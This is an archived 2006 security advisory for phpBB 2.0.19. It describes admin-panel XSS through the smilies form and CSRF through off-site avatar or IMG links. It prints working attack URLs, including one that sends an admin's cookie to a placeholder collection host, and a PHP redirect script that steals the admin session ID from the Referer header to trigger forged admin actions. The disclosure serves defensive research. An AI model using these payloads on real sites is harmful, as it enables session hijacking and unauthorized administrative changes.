what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phpBB2.0.19.txt

phpBB2.0.19.txt
Posted Feb 6, 2006
Authored by Maksymilian Arciemowicz | Site securityreason.com

phpBB 2.0.19 suffers from several Cross Site Request Forgeries and XSS vulnerabilities. Detailed exploitation provided.

tags | exploit, vulnerability
SHA-256 | 36244d0f29ea85a82eb2aee292986ca0e89de4e9442204575d28b918fa6e808a

phpBB2.0.19.txt

Change Mirror Download
Orginal Source: http://securityreason.com/achievement_securityalert/31

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 3.2.2006
from SecurityReason.Com
CVE-2006-0437 for the XSS issues
CVE-2006-0438 for the CSRF issues


- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source
bulletin board package. phpBB has a

user-friendly interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP

server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC
database servers, phpBB is the ideal

free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. XSS admin ---
In admin/admin_smilies.php you can create, modifcate smille. So nothing
special but phpBB don't check what is going to db.

case savenew

- -448-473---
$smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ?
$HTTP_POST_VARS['smile_code'] :

$HTTP_GET_VARS['smile_code'];
$smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ?
$HTTP_POST_VARS['smile_url'] :

$HTTP_GET_VARS['smile_url'];
$smile_url = phpbb_ltrim(basename($smile_url), "'");
$smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ?

$HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];
$smile_code = trim($smile_code);
$smile_url = trim($smile_url);
$smile_emotion = trim($smile_emotion);

// If no code was entered complain ...
if ($smile_code == '' || $smile_url == '')
{
message_die(GENERAL_MESSAGE, $lang['Fields_empty']);
}

//
// Convert < and > to proper htmlentities for parsing.
//
$smile_code = str_replace('<', '<', $smile_code);
$smile_code = str_replace('>', '>', $smile_code);

//
// Save the data to the smiley table.
//
$sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon)
VALUES ('" . str_replace("\'", "''", $smile_code) . "', '" .
str_replace("\'", "''",

$smile_url) . "', '" . str_replace("\'", "''", $smile_emotion) . "')";
$result = $db->sql_query($sql);
- -448-473---

Only "<" and ">" are restricted.

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrgreen.gif&smile_emotion=c"
onmouseover="alert('SecurityReason.Com')" &sid=SIDofADMIN

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:h:&smile_url=icon_mrgreen.gif"%20onmouseover='alert("SecurityReason.Com")'%20&sid=SIDofADMIN

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&smile_url=icon_mrgreen.gif"%20onmouseover="alert(document.location='http://[SRVER]/cookies?'+document.cookie)"%20&sid=SIDofADMIN

and you have new smile. Ofcourse you can better do exploit. For IE and etc.


- --- 2. Cross Site Request Forgeries ---
phpBB admin in Administration Panel have SID in url. Ok. Example if you want
see user profil or split, lock someone

post etc.

Like:
http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7ec505d0
http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec5900fed3b35
etc.

If this user have "Link to off-site Avatar" ON or is bbcode (IMG) ON then you
can create url to script with referer for admin.So when admin open profil the
url will be executed. Need be referer in request.

Next problem is:

103# if ( !preg_match("#^((ht|f)tp://)([^ \?&=\#\"\n\r\t<]*?(\.(jpg|jpeg|gif|
png))$)#is", $avatar_filename) )

in includes/unsercp_avatar.php.

Why? Because this preg() don't have limit of chars.
In mysql phpbb DB you have (*_users)

user_avatar varchar(100)

only 100 chars will go to db.
So you can post url like

http://[HOST]/[DIR]/script.php/[100 chars].jpg

Sent:
http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur.jpg

and in db is:
http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur

or in bbcode (IMG)

http://[HOST]/[DIR]/script.php/securityreason.jpg

Nothing special.. Ok..

You need create new user (nick name can be "FUCKmeADMIN" etc). And upload one
script. Doesn't need be in serverwhere is phpbb.

- -script.php--
<?php
# SecurityReason.Com writed by Maksymilian Arciemowicz
# Example exploit

$operation='http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&smile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'%20';
#
http://[host]/admin/admin_smilies.php?mode=savenew&smile_code=a&smile_url=icon_mrgreen.gif"
onmouseover='alert(document.cookie)'

$sid='';
preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);

if($sid[1]!=''){
header("Location: ".$operation."&sid=".$sid[1]);
}

?>
- -script.php--

In this script you need give someone operation. I think, can be:

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&smile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'%20
create new smilie.. and all char a, change to image with javascript (XSS).

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=delete&id=63
Delete someone smile.

http://[HOST]/[DIR]/admin/admin_words.php?mode=delete&id=1&sid=c1db64124b7ced0668dec5900fed3b35
Delete word censor.

http://[HOST]/[DIR]/admin/admin_forums.php?mode=forum_order&move=15&f=4
Change position of forum=4.

http://[HOST]/[DIR]/admin/admin_ranks.php?mode=delete&id=4
Delete Rank Administration

http://[HOST]/[DIR]/login.php?logout=true
Logout

etc..

If admin have in url SID and img tag is displaying that this script can get
SID form HTTP_REFERER and redirect tooperation for admin
(header("Location...")).
Admin can't see result. This XSS in Point 1 can you used for this trick.

Solution is don't displaying <IMG> tags from user where have you SID in url.
And use POST to any operations like create, remove smilies etc.

- --- 3. Greets ---
sp3x

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFD41JC3Ke13X/fTO4RAhpsAJ46jnHCF0c9RROYPC1T88N9D/iOigCgwKUV
3YyVMR1NFsznOmjVpv6LVAc=
=b2mM
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close